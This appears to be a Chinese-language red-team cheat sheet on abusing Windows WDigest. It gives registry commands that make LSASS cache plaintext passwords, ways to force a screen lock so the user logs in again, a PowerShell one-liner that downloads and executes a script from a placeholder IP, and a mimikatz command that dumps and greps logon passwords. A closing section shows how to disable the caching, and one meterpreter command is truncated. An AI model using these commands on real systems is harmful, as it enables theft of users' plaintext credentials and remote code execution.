wdigest

windows可以看作是一个SSO,WDigest.dll从Windows XP引入,目的是为了把明文密码存在lsass里进行重复认证,从而减少用户输入密码的次数。并且无论是否使用它,都会将其存储在内存中。

老版本的系统打了补丁KB2871997,可以修改注册表禁用WDigest协议。

原理

在Windows Server2012及其以后的版本中,系统默认禁用Wdigest Auth,lsass进程不再保存明文口令。Mimikatz也就读不到密码明文,这是微软为了防止内存中泄露明文密码做的一个安全措施。

但由于一些系统服务需要用到 Wdigest Auth,所以该选项是可以手动开启的(开启后,需要用户重新登录/锁屏重新输入密码生效)。

修改注册表,然后使用cmd锁屏/重启让用户重新登陆使mimikatz可以读取明文密码。


开启wdigest Auth读取明文密码

cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

meterpreter:
reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogon

强制锁屏让用户输入密码/重启

cmd:

rundll32 user32.dll,LockWorkStation

Powershell:

Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

powershell -c “IEX (New-Object Net.WebClient).DownloadString(‘https://x.x.x.x/Lock-WorkStation.ps1’);”

读取内存明文

mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit
type mimikatz.log | find /I “password”

WDigest 禁用缓存

WDigest默认在 win2008 之前启用,但是在 win2008 之后的系统上,默认是关闭的。如果在 win2008 之前的系统上打了 KB2871997 补丁,那么就可以去启用或者禁用 WDigest。

启用或者禁用WDigest修改注册表位置:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest

UseLogonCredential 值设置为 0, WDigest不把凭证缓存在内存,mimiktaz抓不到明文;UseLogonCredential 值设置为 1, WDigest把凭证缓存在内存,mimiktaz可以获取到明文。

在注册表中将UseLogonCredential 值设置为 0,或者使用命令

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
  • Created 2022-10-22 11:38
  • Published 2021-06-17 11:43
  • Updated 2024-10-20 23:44